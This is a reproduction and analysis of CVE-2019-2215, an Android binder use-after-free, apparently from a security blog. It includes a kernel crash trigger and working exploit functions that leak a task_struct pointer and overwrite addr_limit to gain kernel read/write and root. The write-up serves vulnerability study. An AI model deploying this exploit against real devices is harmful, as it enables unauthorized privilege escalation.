CVE-2019-2215 Reproduction Notes

2021-03-16 21:50:26 Author: xz.aliyun.com

CVE-2019-2215

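Information gathering

360 Security Response: Android local privilege escalation advisory
bugs.chromium project-zero email: Project Zero's public issue thread
Project Zero blog: a detailed account of the root cause and the exploitation technique
Linux source for various versions: convenient for looking up type definitions, but many of the structs and definitions there are dated, so other sources are a better reference for that part of the code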

Test environment

Pixel 2
Android 9
Kernel 4.4.169-gee9976dde895

PoC

Compiling the PoC

Download the latest NDK release from Google.

Compile with:

$ ndk/<ndk-version>/toolchains/llvm/prebuilt/<host-platform>/bin/aarch64-linux-android28-clang -o poc poc.c

poc.c

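Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1942

A short PoC consisting only of main() that triggers the bug and shows where the kernel is vulnerable. Running it on an unpatched system may crash the kernel.

poc2.c

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1942

Uses the bug to obtain arbitrary kernel read/write. After this PoC runs, the output of uname -a contains EXPLOITED KERNEL.

poc3.c

Source: https://hernan.de/blog/tailoring-cve-2019-2215-to-achieve-root/

Uses the bug for local privilege escalation.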

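Vulnerability analysis

Vulnerability description

Root cause: when a process that uses epoll on a binder fd calls BINDER_THREAD_EXIT to end the binder thread, the binder_thread struct is freed. Later, when the process exits or calls EPOLL_CTL_DEL, epoll walks the wait list inside the freed binder_thread in order to unlink its entry.
The wait list that epoll touches during this cleanup lives inside the already-freed binder_thread, which is a use-after-free (UAF). If the freed binder_thread is reclaimed with attacker-controlled memory first, the unlink operates on that memory and leaks information. That information can then be escalated to arbitrary kernel read/write and eventually to root.

Struct definitions and the UAF sequence

binder_thread is the struct at the center of the UAF: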

//https://android.googlesource.com/kernel/msm/+/550c01d0e051461437d6e9d72f573759e7bc5047/drivers/android/binder.c#615
struct binder_thread {
        struct binder_proc *proc;
        struct rb_node rb_node;
        struct list_head waiting_thread_node;
        int pid;
        int looper;              /* only modified by this thread */
        bool looper_need_return; /* can be written by other thread */
        struct binder_transaction *transaction_stack;
        struct list_head todo;
        bool process_todo;
        struct binder_error return_error;
        struct binder_error reply_error;
        //uaf point (offset 0xA0)
        wait_queue_head_t wait;
        struct binder_stats stats;
        atomic_t tmp_ref;
        bool is_dead;
        //root point (offset 0x190)
        struct task_struct *task;
};

poc.c, the code that triggers the bug:

//poc.c
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define BINDER_THREAD_EXIT 0x40046208ul
int main()
{
        int fd, epfd;
        struct epoll_event event = { .events = EPOLLIN };
        fd = open("/dev/binder0", O_RDONLY);
        epfd = epoll_create(1000);
        epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event);
        ioctl(fd, BINDER_THREAD_EXIT, NULL);
}

KASAN crash output (partially elided):

//https://bugs.chromium.org/p/project-zero/issues/attachmentText?aid=414028
[  464.504637] c0   3033 ==================================================================
[  464.504747] c0   3033 BUG: KASAN: use-after-free in remove_wait_queue+0x48/0x90
[  464.511836] c0   3033 Write of size 8 at addr 0000000000000000 by task new.out/3033
[  464.518893] c0   3033
[  464.526548] c0   3033 CPU: 0 PID: 3033 Comm: new.out Tainted: G         C      4.4.177-ga9e0ec5cb774 #1
[  464.529044] c0   3033 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT)
[  464.538334] c0   3033 Call trace:
[  464.545928] c0   3033 [<ffffff900808f0e8>] dump_backtrace+0x0/0x34c
[  464.549328] c0   3033 [<ffffff900808f574>] show_stack+0x1c/0x24
[  464.555411] c0   3033 [<ffffff900858bcc8>] dump_stack+0xb8/0xe8
[  464.561319] c0   3033 [<ffffff90082b1ecc>] print_address_description+0x94/0x334
[  464.567219] c0   3033 [<ffffff90082b23f0>] kasan_report+0x1f8/0x340
[  464.574501] c0   3033 [<ffffff90082b0740>] __asan_store8+0x74/0x90
[  464.580753] c0   3033 [<ffffff9008139fc0>] remove_wait_queue+0x48/0x90
[  464.587125] c0   3033 [<ffffff9008336874>] ep_unregister_pollwait.isra.8+0xa8/0xec
[  464.593617] c0   3033 [<ffffff9008337744>] ep_free+0x74/0x11c
[  464.601149] c0   3033 [<ffffff9008337820>] ep_eventpoll_release+0x34/0x48
[  464.606988] c0   3033 [<ffffff90082c589c>] __fput+0x10c/0x32c
[  464.613724] c0   3033 [<ffffff90082c5b38>] ____fput+0x18/0x20
[  464.619463] c0   3033 [<ffffff90080eefdc>] task_work_run+0xd0/0x128
[  464.625193] c0   3033 [<ffffff90080bd890>] do_exit+0x3e4/0x1198
[  464.631260] c0   3033 [<ffffff90080c0ff8>] do_group_exit+0x7c/0x128
[  464.637167] c0   3033 [<ffffff90080c10c4>] __wake_up_parent+0x0/0x44
[  464.643421] c0   3033 [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
[  464.649944] c0   3033
[  464.655899] c0   3033 Allocated by task 3033:
[  464.658257]  [<ffffff900808e5a4>] save_stack_trace_tsk+0x0/0x204
[  464.663899]  [<ffffff900808e7c8>] save_stack_trace+0x20/0x28
[  464.669882]  [<ffffff90082b0b14>] kasan_kmalloc.part.5+0x50/0x124
[  464.675528]  [<ffffff90082b0e38>] kasan_kmalloc+0xc4/0xe4
[  464.681597]  [<ffffff90082ac8a4>] kmem_cache_alloc_trace+0x12c/0x240
[  464.686992]  [<ffffff90094093c0>] binder_get_thread+0xdc/0x384
[  464.693319]  [<ffffff900940969c>] binder_poll+0x34/0x1bc
[  464.699127]  [<ffffff900833839c>] SyS_epoll_ctl+0x704/0xf84
[  464.704423]  [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
[  464.709971] c0   3033
[  464.714124] c0   3033 Freed by task 3033:
[  464.716396]  [<ffffff900808e5a4>] save_stack_trace_tsk+0x0/0x204
[  464.721699]  [<ffffff900808e7c8>] save_stack_trace+0x20/0x28
[  464.727678]  [<ffffff90082b16a4>] kasan_slab_free+0xb0/0x1c0
[  464.733322]  [<ffffff90082ae214>] kfree+0x8c/0x2b4
[  464.738952]  [<ffffff900940ac00>] binder_thread_dec_tmpref+0x15c/0x1c0
[  464.743750]  [<ffffff900940d590>] binder_thread_release+0x284/0x2e0
[  464.750253]  [<ffffff90094149e0>] binder_ioctl+0x6f4/0x3664
[  464.756498]  [<ffffff90082e1364>] do_vfs_ioctl+0x7f0/0xd58
[  464.762052]  [<ffffff90082e1968>] SyS_ioctl+0x9c/0xc0
[  464.767513]  [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
------------------------------ ... ... -----------------------------------
[  465.201706] c0   3033 Call trace:
------------------------------ ... ... -----------------------------------
[  465.298084] c0   3033 [<ffffff90082b1ddc>] kasan_end_report+0x38/0x3c
[  465.306712] c0   3033 [<ffffff90082b22e4>] kasan_report+0xec/0x340
[  465.313308] c0   3033 [<ffffff90082b0740>] __asan_store8+0x74/0x90
[  465.319390] c0   3033 [<ffffff9008139fc0>] remove_wait_queue+0x48/0x90
[  465.325581] c0   3033 [<ffffff9008336874>] ep_unregister_pollwait.isra.8+0xa8/0xec
[  465.332075] c0   3033 [<ffffff9008337744>] ep_free+0x74/0x11c
[  465.339607] c0   3033 [<ffffff9008337820>] ep_eventpoll_release+0x34/0x48
[  465.345437] c0   3033 [<ffffff90082c589c>] __fput+0x10c/0x32c
[  465.352183] c0   3033 [<ffffff90082c5b38>] ____fput+0x18/0x20
[  465.357920] c0   3033 [<ffffff90080eefdc>] task_work_run+0xd0/0x128
[  465.363643] c0   3033 [<ffffff90080bd890>] do_exit+0x3e4/0x1198
[  465.369711] c0   3033 [<ffffff90080c0ff8>] do_group_exit+0x7c/0x128
[  465.375617] c0   3033 [<ffffff90080c10c4>] __wake_up_parent+0x0/0x44
[  465.381882] c0   3033 [<ffffff90080842b0>] el0_svc_naked+0x24/0x28
[  465.388494] c0   3033 Code: f9400261 f00124e0 91000000 945d2daa (d4210000)
[  465.394428] c0   3033 ---[ end trace 3129689a85316455 ]---

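Using the KASAN output, we can reconstruct the chain of calls that leads to the crash:

epoll_ctl allocates the binder_thread; the allocation path is listed under "Allocated by task" (SyS_epoll_ctl -> binder_poll -> binder_get_thread)
The ioctl call then frees the binder_thread; the path is listed under "Freed by task", from SyS_ioctl down to kfree
Up to this point the program runs normally, but the crash fires as the program is about to exit; the final "Call trace" shows the stack at the time of the crash
Reading that trace from bottom to top in call order, the frames below ep_eventpoll_release belong to process exit, and the frames from ep_eventpoll_release up to remove_wait_queue are epoll's cleanup at exit. In other words, the crash happens inside remove_wait_queue

In remove_wait_queue, the wq_head argument is the wait member of binder_thread: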

//https://code.woboq.org/linux/linux/kernel/sched/wait.c.html#39
void remove_wait_queue(struct wait_queue_head *wq_head, struct wait_queue_entry *wq_entry)
{
  unsigned long flags;
  spin_lock_irqsave(&wq_head->lock, flags);
  __remove_wait_queue(wq_head, wq_entry);
  spin_unlock_irqrestore(&wq_head->lock, flags);
}

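After binder_thread is freed, epoll still holds a pointer to its wait member (the wait_queue_head embedded in binder_thread), and nothing removes that reference. The pointer therefore refers to freed memory. When the process exits, remove_wait_queue takes the spinlock through that pointer with spin_lock_irqsave and then unlinks the entry, and KASAN flags the access inside remove_wait_queue.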
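
The dangling reference can be modelled in user space. The sketch below is only an illustration: `model_thread`, `model_epoll_entry` and the helper functions are hypothetical stand-ins, not kernel code, and "freeing" is modelled by poisoning a live object so the example stays well-defined.

```c
#include <assert.h>
#include <string.h>

struct list_head { struct list_head *next, *prev; };

/* Stand-in for the wait_queue_head_t embedded in binder_thread. */
struct model_wait_head { unsigned int lock; struct list_head task_list; };

/* Stand-in for binder_thread: the wait head is embedded, not pointed to. */
struct model_thread { int pid; struct model_wait_head wait; int freed; };

/* Stand-in for epoll's per-registration entry, which stores a POINTER
 * to a wait head owned by another object. */
struct model_epoll_entry { struct model_wait_head *whead; };

/* Models EPOLL_CTL_ADD: epoll remembers where the thread's wait head lives. */
void model_epoll_add(struct model_epoll_entry *e, struct model_thread *t)
{
    e->whead = &t->wait;
}

/* Models BINDER_THREAD_EXIT: the thread is released, but nothing tells
 * epoll to drop its pointer. Poisoning stands in for a real kfree(). */
void model_thread_exit(struct model_thread *t)
{
    memset(&t->wait, 0x6b, sizeof(t->wait));
    t->freed = 1;
}

/* Returns 1 if epoll would still reach into a released thread. */
int model_epoll_entry_is_dangling(const struct model_epoll_entry *e,
                                  const struct model_thread *t)
{
    return t->freed && e->whead == &t->wait;
}
```

After `model_thread_exit`, the entry's `whead` still points at the poisoned wait head, which is the situation remove_wait_queue runs into.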

Exploitation: arbitrary address write

main

int epfd;

void *dummy_page_4g_aligned;
unsigned long current_ptr;
int binder_fd;
int kernel_rw_pipe[2];

int main(void) {
  printf("Starting POC\n");
  //pin_to(0);

  dummy_page_4g_aligned = mmap((void*)0x100000000UL, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
  if (dummy_page_4g_aligned != (void*)0x100000000UL)
    err(1, "mmap 4g aligned");
  if (pipe(kernel_rw_pipe)) err(1, "kernel_rw_pipe");

  binder_fd = open("/dev/binder", O_RDONLY);
  epfd = epoll_create(1000);
  leak_task_struct();
  clobber_addr_limit();

  setbuf(stdout, NULL);
  printf("should have stable kernel R/W now\n");
 ......
}

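Maps 0x2000 bytes at the fixed address 0x100000000 and stores the result in the global dummy_page_4g_aligned. This mapping is used later when crafting data: because the low 32 bits of its address are zero, it gets past the spin_lock_irqsave check.
Opens "/dev/binder" and calls epoll_create, the same initial steps as poc.c, to set up epoll
Calls leak_task_struct to leak the task_struct address
Calls clobber_addr_limit to overwrite addr_limit, giving arbitrary kernel read/write
The remaining code uses that read/write capability to modify system attributes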
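
Why a 4 GiB-aligned address helps can be shown with a small calculation. This is a sketch under two assumptions that are not spelled out in the original: the lock is a 32-bit field at the very start of the wait head, and a value of zero reads as unlocked. The function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Address requested from mmap() in the PoC. */
#define DUMMY_PAGE_ADDR UINT64_C(0x100000000)

/* arm64 is little-endian, so the lowest-addressed 4 bytes of an 8-byte
 * iov_base are its low 32 bits. Those are the bytes a 32-bit lock field
 * at the same offset would read. */
uint32_t lock_word_seen_by_kernel(uint64_t iov_base)
{
    return (uint32_t)(iov_base & 0xffffffffu);
}

/* Assumption: a zero lock word means "not held". */
int lock_looks_unlocked(uint64_t iov_base)
{
    return lock_word_seen_by_kernel(iov_base) == 0;
}
```

An ordinary mmap address such as 0x7f12345000 would leave a non-zero lock word, which is why the PoC insists on the fixed mapping.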

The two functions that matter are leak_task_struct and clobber_addr_limit; each is analyzed in turn below.

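Leaking the task_struct pointer

To exploit the UAF, writev is first used to reclaim the space freed from binder_thread. EPOLL_CTL_DEL then calls remove_wait_queue, which writes the address of wait into the reclaimed memory. Because both wait and the task_struct pointer live inside binder_thread, the task_struct pointer can be located from that address with a fixed offset.

Reclaiming kernel memory with writev

Background reading: the readv and writev functions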

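When writev is called, rw_copy_check_uvector checks that every entry of the struct iovec array passed as the second argument points into user space. Once the check passes, the array is copied into kernel memory, and it is not checked again even if an iov_base later stops pointing to user space. The exploit relies on both properties. An iovec array whose size equals or is close to that of binder_thread is very likely to land in the chunk that binder_thread just freed (with 25 entries the array is 400 bytes, and arrays of more than UIO_FASTIOV = 8 entries are copied into a kmalloc'd buffer rather than onto the stack). And because rw_copy_check_uvector only checks once, a kernel address leaked into the array can then be used to read kernel memory.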
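
The gather behaviour that the PoC builds on can be observed harmlessly in user space. The sketch below assumes a Linux host; `writev_gather_demo` and the `DEMO_*` constants are hypothetical names. It sends two small buffers through a 25-entry array whose first ten entries are empty and reads them back from a pipe.

```c
#include <assert.h>
#include <string.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

#define DEMO_IOVEC_COUNT 25   /* same element count as the PoC's array */
#define DEMO_FIRST_USED  10   /* entries before this index stay zeroed */

/* Writes two buffers via writev() and reads the pipe back into `out`.
 * Returns the number of bytes read, or -1 on failure. */
ssize_t writev_gather_demo(char *out, size_t out_len)
{
    struct iovec iov[DEMO_IOVEC_COUNT];
    char first[] = "AAAA";
    char second[] = "BBBB";
    int fds[2];
    ssize_t written, got;

    memset(iov, 0, sizeof(iov));
    iov[DEMO_FIRST_USED].iov_base = first;
    iov[DEMO_FIRST_USED].iov_len = 4;
    iov[DEMO_FIRST_USED + 1].iov_base = second;
    iov[DEMO_FIRST_USED + 1].iov_len = 4;

    if (pipe(fds) != 0)
        return -1;
    /* Zero-length entries contribute nothing; data is gathered in order. */
    written = writev(fds[1], iov, DEMO_IOVEC_COUNT);
    got = (written > 0) ? read(fds[0], out, out_len) : -1;
    close(fds[0]);
    close(fds[1]);
    return got;
}
```

The PoC uses the same array shape, but sizes the pipe so that the call blocks between the two non-empty entries.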
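Leaking the address of wait via remove_wait_queue

When epoll handles EPOLL_CTL_DEL, it calls remove_wait_queue to clean up the wait list. With the iovec data crafted to get past the spin_lock_irqsave check, execution reaches __remove_wait_queue. The relevant functions are: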
```
static inline void __remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old)
{
    list_del(&old->task_list);
}
static inline void list_del(struct list_head *entry)
{
        __list_del(entry->prev, entry->next);
        entry->next = LIST_POISON1;
        entry->prev = LIST_POISON2;
}
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
        next->prev = prev;
        WRITE_ONCE(prev->next, next);
}
```
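The call chain is: __remove_wait_queue -> list_del -> __list_del

The entry argument of list_del is the task_list node being removed. After __list_del runs, that node has been unlinked from the wait list: its predecessor's next and its successor's prev now point at each other.

When that node is the only entry on the list, its predecessor and successor are both the list head, so __list_del makes the head's next and prev point at the head itself.

The head sits inside the memory we reclaimed from binder_thread, so the values written into next and prev leak the address of the head, that is, the address of the wait member's task_list inside binder_thread.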
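
The effect of the unlink on the reclaimed memory can be simulated in user space. The following is a sketch, assuming a 64-bit host and the offsets quoted in this article (wait at 0xA0, so wait.task_list at 0xA8); `reclaimed_slot`, `model_list_del` and `simulate_unlink` are hypothetical names.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <sys/uio.h>

struct list_head { struct list_head *next, *prev; };

#define BINDER_THREAD_SZ  0x190
#define WAITQUEUE_OFFSET  0xA0
#define IOVEC_ARRAY_SZ    (BINDER_THREAD_SZ / 16)
#define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16)

_Static_assert(sizeof(struct iovec) == 16, "model assumes a 64-bit host");

/* Two views of the same bytes: what writev() placed there, and where
 * the stale binder_thread.wait.task_list used to live. */
union reclaimed_slot {
    struct iovec iov[IOVEC_ARRAY_SZ];
    struct {
        unsigned char pad[WAITQUEUE_OFFSET + 8]; /* earlier fields + lock */
        struct list_head task_list;              /* at offset 0xA8 */
    } stale;
};

/* Same unlink logic as __list_del(), minus WRITE_ONCE. */
void model_list_del(struct list_head *entry)
{
    entry->next->prev = entry->prev;
    entry->prev->next = entry->next;
}

/* Simulates EPOLL_CTL_DEL on a slot already refilled with iovecs and
 * returns the address of the stale list head that gets written back. */
uintptr_t simulate_unlink(union reclaimed_slot *slot)
{
    /* epoll's wait entry was the only element on the list, so both of
     * its links point at the head inside the freed object. */
    struct list_head epoll_wait_entry = {
        .next = &slot->stale.task_list,
        .prev = &slot->stale.task_list,
    };

    model_list_del(&epoll_wait_entry);
    return (uintptr_t)&slot->stale.task_list;
}
```

After the call, the 8 bytes at offsets 0xA8 and 0xB0 of the slot both hold the head's own address, which in the iovec view are `iov[10].iov_len` and `iov[11].iov_base`.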

Now we can analyze the PoC:

// size of struct binder_thread : 408Bytes = 0x198
#define BINDER_THREAD_SZ 0x190
// use struct iovec to refill the freed binder_thread
// size of struct iovec is 16Bytes (64bit system)
#define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16) //25

// offset of wait_queue in binder_thread
#define WAITQUEUE_OFFSET 0xA0

// figure out the index of wait_queue in the iovec array
#define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16) //10

void leak_task_struct(void)
{
  struct epoll_event event = { .events = EPOLLIN };
  if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add");

  struct iovec iovec_array[IOVEC_ARRAY_SZ];
  memset(iovec_array, 0, sizeof(iovec_array));

  iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
  iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; /* wq->task_list->next */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;

  int b;
  int pipefd[2];
  if (pipe(pipefd)) err(1, "pipe");
  if (fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000) err(1, "pipe size");
  static char page_buffer[0x1000];
  //if (write(pipefd[1], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "fill pipe");

  pid_t fork_ret = fork();
  if (fork_ret == -1) err(1, "fork");
  if (fork_ret == 0){
    /* Child process */
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    sleep(2);
    printf("CHILD: Doing EPOLL_CTL_DEL.\n");
    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
    printf("CHILD: Finished EPOLL_CTL_DEL.\n");
    // first page: dummy data
    if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
    close(pipefd[1]);
    printf("CHILD: Finished write to FIFO.\n");

    exit(0);
  }
  //printf("PARENT: Calling READV\n");
  ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
  b = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);
  printf("writev() returns 0x%x\n", (unsigned int)b);
  // second page: leaked data
  if (read(pipefd[0], page_buffer, sizeof(page_buffer)) != sizeof(page_buffer)) err(1, "read full pipe");
  //hexdump_memory((unsigned char *)page_buffer, sizeof(page_buffer));

  printf("PARENT: Finished calling READV\n");
  int status;
  if (wait(&status) != fork_ret) err(1, "wait");

  current_ptr = *(unsigned long *)(page_buffer + 0xe8);
  printf("current_ptr == 0x%lx\n", current_ptr);
}

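Calls EPOLL_CTL_ADD to register binder_fd with epoll, as in poc.c
Initializes iovec_array and fills in the crafted data
Creates a pipe and sets its buffer size, used later between parent and child
Forks a child; the child starts by sleeping for two seconds, so follow the parent first
Calls BINDER_THREAD_EXIT; at this point the binder_thread struct has been freed
The parent calls writev, which reads from iovec_array and writes to pipefd[1] (because of how writev works, the memory freed from binder_thread is now occupied by the kernel copy of iovec_array). From the crafted data, iovec_array[9] and everything before it is zero, so writev starts at iovec_array[10] and writes the 0x1000 bytes of junk at dummy_page_4g_aligned into the pipe. The pipe's capacity is also 0x1000, so writev blocks and execution moves to the child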
Since binder_thread has been replaced by the crafted data, memory now looks like this:

| binder_thread struct | iovec_array |
| ------------------------- | ------------------------------------------------------ |
| 0x00: ... | 0x00: iovec_array[0].iov_base |
| 0x08: ... | 0x08: iovec_array[0].iov_len |
| ... | ... |
| 0xA0: wait.lock | 0xA0: iovec_array[10].iov_base (dummy_page_4g_aligned) |
| 0xA8: wait.task_list.next | 0xA8: iovec_array[10].iov_len (0x1000) |
| 0xB0: wait.task_list.prev | 0xB0: iovec_array[11].iov_base (0xDEADBEEF) |
| 0xB8: ... | 0xB8: iovec_array[11].iov_len (0x1000) |
| ... | ... |

The child now calls EPOLL_CTL_DEL and triggers the UAF. Inside remove_wait_queue, dummy_page_4g_aligned gets past the spinlock check, and the list unlink makes wait.task_list.next and wait.task_list.prev both point at wait.task_list itself, so iovec_array[10].iov_len and iovec_array[11].iov_base now both hold the leaked address
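The child then calls read, draining the junk data the parent wrote so that the parent unblocks. The child exits and execution returns to the parent
The parent resumes the unfinished writev and writes 0x1000 bytes starting at iovec_array[11].iov_base into the pipe. That iov_base was overwritten in the child with the leaked address of wait.task_list, so what gets written is kernel memory starting at that address
The parent calls read and stores the data in page_buffer
The task_struct pointer is read from page_buffer at offset 0xe8, which is the offset of task in binder_thread (0x190) minus the offset of wait.task_list (0xA8). The 0x190-byte iovec array stops just short of that field, so its original value is still intact. The pointer is stored in current_ptr and the function returns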
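
The offset arithmetic in the last step can be written out as a short sketch. It uses only the offsets quoted in this article; `leak_offset_of` and `extract_task_ptr` are hypothetical helper names, not part of the PoC.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define WAITQUEUE_OFFSET 0xA0                   /* binder_thread.wait */
#define TASK_LIST_OFFSET (WAITQUEUE_OFFSET + 8) /* wait.task_list, after the lock */
#define TASK_OFFSET      0x190                  /* binder_thread.task */

/* The leaked page starts at &wait.task_list, so a field of the stale
 * binder_thread appears at (field offset - 0xA8) inside it. */
size_t leak_offset_of(size_t field_offset)
{
    return field_offset - TASK_LIST_OFFSET;
}

/* Pulls the saved task_struct pointer out of a leaked page. */
unsigned long extract_task_ptr(const unsigned char *page)
{
    unsigned long task;

    memcpy(&task, page + leak_offset_of(TASK_OFFSET), sizeof(task));
    return task;
}
```

`leak_offset_of(TASK_OFFSET)` evaluates to 0xe8, the constant that leak_task_struct hard-codes.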

(Figure: the leak process.)

Overwriting addr_limit

Straight to the analysis:

void clobber_addr_limit(void)
{
  struct epoll_event event = { .events = EPOLLIN };
  if (epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &event)) err(1, "epoll_add");

  struct iovec iovec_array[IOVEC_ARRAY_SZ];
  memset(iovec_array, 0, sizeof(iovec_array));

  unsigned long second_write_chunk[] = {
    1, /* iov_len */
    0xdeadbeef, /* iov_base (already used) */
    0x8 + 2 * 0x10, /* iov_len (already used) */
    current_ptr + 0x8, /* next iov_base (addr_limit) */
    8, /* next iov_len (sizeof(addr_limit)) */
    0xfffffffffffffffe /* value to write */
  };

  iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
  iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; /* wq->task_list->next */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
  iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; /* iov_len of previous, then this element and next element */
  iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD;
  iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks)) err(1, "socketpair");
  if (write(socks[1], "X", 1) != 1) err(1, "write socket dummy byte");

  pid_t fork_ret = fork();
  if (fork_ret == -1) err(1, "fork");
  if (fork_ret == 0){
    /* Child process */
    prctl(PR_SET_PDEATHSIG, SIGKILL);
    sleep(2);
    printf("CHILD: Doing EPOLL_CTL_DEL.\n");
    epoll_ctl(epfd, EPOLL_CTL_DEL, binder_fd, &event);
    printf("CHILD: Finished EPOLL_CTL_DEL.\n");
    if (write(socks[1], second_write_chunk, sizeof(second_write_chunk)) != sizeof(second_write_chunk))
      err(1, "write second chunk to socket");
    exit(0);
  }
  ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
  struct msghdr msg = {
    .msg_iov = iovec_array,
    .msg_iovlen = IOVEC_ARRAY_SZ
  };
  printf("PARENT: Doing recvmsg.\n");
  int recvmsg_result = recvmsg(socks[0], &msg, MSG_WAITALL);
  printf("PARENT recvmsg() returns %d, expected %lu\n", recvmsg_result,
      (unsigned long)(iovec_array[IOVEC_INDX_FOR_WQ].iov_len +
      iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len +
      iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len));
}

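Calls EPOLL_CTL_ADD, as before
Initializes iovec_array with crafted data
Initializes second_write_chunk with crafted data
Creates a socket pair with socketpair and writes 1 byte to socks[1]

Background reading: socketpair, recvmsg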
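Forks a child, which calls sleep(2); follow the parent
Calls BINDER_THREAD_EXIT; at this point the binder_thread struct has been freed
Calls recvmsg, which reads the 1 byte written to the socket earlier. This is the first read stage (recvmsg#1)

Like writev, recvmsg copies the user-space iovec array into kernel memory, so the call reclaims the memory freed from binder_thread
The socket has no more data, so the parent blocks and execution moves to the child
The child calls EPOLL_CTL_DEL and triggers the UAF. As before, iovec_array[10].iov_len and iovec_array[11].iov_base are overwritten with the address of wait.task_list
The child writes second_write_chunk to the socket. The socket now has data, so the parent unblocks; the child exits and execution returns to the parent
Following iovec_array[11].iov_len, the parent reads 0x28 bytes to the address in iovec_array[11].iov_base. This is the second read stage (recvmsg#2). That address is now wait.task_list, which overlaps iovec_array[10].iov_len, so these 0x28 bytes overwrite everything from iovec_array[10].iov_len through iovec_array[12].iov_len

second_write_chunk is 0x30 bytes, so recvmsg still has 8 bytes to read: the final 8 bytes of second_write_chunk, 0xfffffffffffffffe. By now recvmsg#2 has overwritten iovec_array[12].iov_base with current_ptr + 0x8, that is task_struct + 0x8, which is the address of addr_limit. After the third read stage (recvmsg#3), addr_limit is 0xfffffffffffffffe and the process has arbitrary kernel read/write. The function returns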
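
The three read stages can be replayed in user space against an ordinary variable. This is a sketch, assuming a 64-bit host: `model_scatter` is a hypothetical, simplified stand-in for the kernel's scatter copy, and `target` stands in for addr_limit. The point it illustrates is that each iovec entry is read only when it is reached, so an earlier copy can rewrite the entries used later.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>
#include <sys/uio.h>

_Static_assert(sizeof(struct iovec) == 16 && sizeof(uintptr_t) == 8,
               "model assumes a 64-bit host");

/* Copies `len` bytes from `src` into iov[first..count-1], reading each
 * entry's base and length only when that entry is reached. */
size_t model_scatter(struct iovec *iov, int first, int count,
                     const unsigned char *src, size_t len)
{
    size_t done = 0;

    for (int i = first; i < count && done < len; i++) {
        void *base = iov[i].iov_base;   /* read at time of use */
        size_t n = iov[i].iov_len;

        if (n > len - done)
            n = len - done;
        memcpy(base, src + done, n);
        done += n;
    }
    return done;
}

/* Builds the state after EPOLL_CTL_DEL and replays the PoC's two writes. */
void model_clobber(uint64_t *target)
{
    struct iovec iov[13];
    unsigned char dummy;
    unsigned char stream[1 + 6 * 8];
    uintptr_t head = (uintptr_t)&iov[10].iov_len;  /* &wait.task_list */
    uintptr_t chunk[6] = {
        1,                   /* iov[10].iov_len (already used) */
        0xdeadbeef,          /* iov[11].iov_base (already used) */
        0x8 + 2 * 0x10,      /* iov[11].iov_len (already used) */
        (uintptr_t)target,   /* iov[12].iov_base */
        8,                   /* iov[12].iov_len */
        0xfffffffffffffffe   /* value that lands in *target */
    };

    memset(iov, 0, sizeof(iov));
    iov[10].iov_base = &dummy;
    iov[10].iov_len = 1;
    iov[11].iov_base = (void *)head;   /* written there by list_del */
    iov[11].iov_len = 0x8 + 2 * 0x10;
    iov[12].iov_base = (void *)(uintptr_t)0xBEEFDEAD; /* replaced before use */
    iov[12].iov_len = 8;

    stream[0] = 'X';                          /* the dummy byte */
    memcpy(stream + 1, chunk, sizeof(chunk)); /* second_write_chunk */
    model_scatter(iov, 10, 13, stream, sizeof(stream));
}
```

The placeholder 0xBEEFDEAD is never dereferenced: by the time entry 12 is reached, the 0x28-byte copy has already replaced it with the target address.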

// elixir.bootlin.com/linux/v5.5.19/source/include/linux/sched.h#L635
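// The linked Linux version is newer than the test device's 4.4.169 because this site's older sources lack the matching struct definition in 4.4; the definition in this version matches the test device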
struct task_struct {
    #ifdef CONFIG_THREAD_INFO_IN_TASK
    /*
       * For reasons of header soup (see current_thread_info()), this
       * must be the first element of task_struct.
       */
    struct thread_info thread_info;
    #endif
    volatile long state;  /* -1 unrunnable, 0 runnable, >0 stopped */
    void *stack;
    atomic_t usage;
    unsigned int flags;   /* per process flags, defined below */
    unsigned int ptrace;
    ......
}
